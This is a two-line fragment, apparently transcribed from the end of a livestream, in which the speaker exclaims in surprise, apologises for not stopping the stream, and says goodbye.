What the hell is going on? Oh my God.
Sorry for not stopping the stream. In a good way. Bye bye.